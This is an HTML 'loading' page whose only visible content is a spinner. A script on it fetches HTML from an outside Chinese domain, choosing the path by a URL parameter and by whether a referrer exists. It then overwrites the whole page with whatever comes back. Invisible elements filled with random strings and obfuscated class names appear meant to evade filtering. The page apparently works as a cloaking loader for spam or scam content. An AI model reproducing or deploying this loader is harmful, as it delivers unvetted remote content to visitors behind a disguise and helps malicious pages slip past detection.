<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lYoUr2q1AG7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lYoUr2q1AG7 .tPdSLHkXKV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lYoUr2q1AG7 .content {
            line-height: 50px;
            text-align: center
        }

        .lYoUr2q1AG7 .img {
            width: 100%
        }

        .lYoUr2q1AG7 .VYdTje {
            text-align: center
        }

        .lYoUr2q1AG7 .VYdTje span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lYoUr2q1AG7 .VYdTje span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lYoUr2q1AG7 .VYdTje span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lYoUr2q1AG7 .VYdTje span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lYoUr2q1AG7 .VYdTje span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lYoUr2q1AG7 .VYdTje span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lYoUr2q1AG7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rliUUYRKM1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ovWBoH = rliUUYRKM1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ovWBoH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ovWBoH +".html?a=share";
		}
		
        gJS0J9=url+"#"+new Date().getTime();
        gJS0J9 && function() {
            $.get(gJS0J9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >bVr7bcKkq63AISSoBvoazTjGxpzpYVkySGZPSGt2tVNCBCiLvP0nVxKVeUX57hpvJviq8dB5qqLxmOB5gA8AKQpWis</b>
<div style='display:none'>bLxhUOc4xvmBKJPbHEvxxz1ps0hZ0ed3aF8zFRKZQki35mrrwkdeUwVLWNK</div>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>BBC0CfINbTSCHjaw9ySXxJRYhxZeUGzMaeolahVmDjt1ag6iDgkcwPmM0WxKVfOILWgfvei5QFJ</a><div class="lYoUr2q1AG7">
    <div class="tPdSLHkXKV">
        <div class="VYdTje">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>he8n4189yrXJy7N8zJY3ArmTCLoUT4LJQfzag0wD2Rp17ItETro9PGG09</a>
<ul style='display:none' >JaRqlyZjeej4toQzLpflMlKdHicV9</ul>
<ul style='display:none' >JaRqlyZjeej4toQzLpflMlKdHicV9</ul></body>
</html>